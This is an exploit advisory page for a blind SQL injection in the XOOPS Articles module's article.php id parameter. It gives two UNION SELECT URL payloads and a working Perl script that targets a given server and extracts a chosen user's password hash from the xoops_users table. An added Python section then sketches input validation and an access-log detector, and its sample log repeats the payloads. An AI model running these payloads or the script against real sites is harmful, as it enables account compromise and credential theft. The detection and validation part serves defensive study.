Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

2008.05.07
Credit: Cr@zy_King
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/Cr@zy_King / http://coderx.org

Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

Sql 1-2:

article.php?id=3+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),8,9,0,1,2,3,4,5,6,7,8,9,0/*

article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

# Exploit :

#############################################
#Coded By Cr@zy_King http://coderx.org]#
#############################################

use IO::Socket;

# Three arguments are required: server, web path and the target uid.
if (@ARGV != 3) {
    print "\n-----------------------------------\n";
    print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
    print "-----------------------------------\n";
    print "\n4ever Cra\n";
    print "crazy_kinq[at]hotmail.co.uk\n";
    print "http://coderx.org\n";
    print "\n-----------------------------------\n";
    print "\nKullanim: $0 <server> <path> <uid>\n";
    print "Ornek: $0 www.victim.com /path 1\n";
    print "\n-----------------------------------\n";
    exit ();
}

$server = $ARGV[0];
$path   = $ARGV[1];
$uid    = $ARGV[2];

# Plain TCP connection to the web server on port 80.
$socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => "$server",
    PeerPort => "80");

# The id parameter carries the UNION SELECT from the second payload above,
# with whitespace hidden as /**/ comments. $uid is interpolated directly into
# the format string; the trailing $uid argument to printf is unused.
printf $socket ("GET %s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", $path,$server,$uid);

# Look for a 32-character hex-like token between tags in the response body.
while(<$socket>) {
    if (/\>(\w{32})\</) {
        print "\nID '$uid' User Password :\n\n$1\n";
    }
}

# Cr@zy_King
# http://coderx.org
# crazy_kinq (at) hotmail.co (dot) uk [email concealed]
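The following is an added defender-side example, not part of the advisory and not code from XOOPS. It shows the two things a practitioner wants from this report: the input check article.php is missing (an article id must be a bare decimal integer before it goes anywhere near a query), and a detector that finds the comment-obfuscated UNION SELECT payloads quoted above in web server access logs. The module path, the log line format and the hosts and timestamps in SAMPLE_LOG are constructed for the example; the normalizer generalises beyond the page by collapsing both the `/**/` and the `+` spellings of whitespace before matching.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Undo the whitespace-hiding tricks used by the advisory's payloads:
# '+' / %20 are already decoded by parse_qs, inline /**/ comments become
# spaces here, and runs of whitespace collapse to one.
def normalize(value: str) -> str:
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


# The validation article.php should perform before touching the database:
# an article id is a short, bare decimal integer and nothing else.
def is_safe_article_id(raw_id: str) -> bool:
    return re.fullmatch(r"[0-9]{1,10}", raw_id) is not None


UNION_SELECT = re.compile(r"\bunion\b.+\bselect\b")
MODULE_PATH = "/modules/articles/article.php"   # assumed install location


def classify_request(target: str) -> str:
    """Return 'ok', 'bad-id' or 'sqli' for one request target (path + query)."""
    url = urlsplit(target)
    if not url.path.endswith(MODULE_PATH):
        return "ok"
    for raw_id in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if is_safe_article_id(raw_id):
            continue
        if UNION_SELECT.search(normalize(raw_id)):
            return "sqli"
        return "bad-id"          # non-numeric but not a recognised injection
    return "ok"


# Request target out of an Apache/nginx style access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_access_log(lines):
    """Return (line_number, verdict, target) for every request that is not 'ok'."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group(1))
        if verdict != "ok":
            findings.append((n, verdict, m.group(1)))
    return findings


# Constructed sample log: addresses and timestamps are made up; lines 2 and 3
# carry the two payload spellings from the advisory, line 4 a plain bad id.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/May/2008:10:00:01 +0000] "GET /modules/articles/article.php?id=3 HTTP/1.0" 200 4210',
    '10.0.0.5 - - [07/May/2008:10:00:02 +0000] "GET /modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/* HTTP/1.0" 200 4388',
    '10.0.0.6 - - [07/May/2008:10:00:03 +0000] "GET /modules/articles/article.php?id=3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/* HTTP/1.0" 200 4301',
    '10.0.0.7 - - [07/May/2008:10:00:04 +0000] "GET /modules/articles/article.php?id=abc HTTP/1.0" 200 4100',
    '10.0.0.8 - - [07/May/2008:10:00:05 +0000] "GET /modules/news/index.php?storyid=7 HTTP/1.0" 200 3900',
]

if __name__ == "__main__":
    for n, verdict, target in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {target[:60]}")
```

`is_safe_article_id` is the allow-list the module needs; matching the UNION SELECT pattern is only useful for triage of logs after the fact, since it will not catch every SQL injection shape. The detector normalises before matching because the payload in the advisory puts `/**/` between every keyword precisely to defeat a naive `UNION SELECT` substring match.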


Copyright 2020, cxsecurity.com
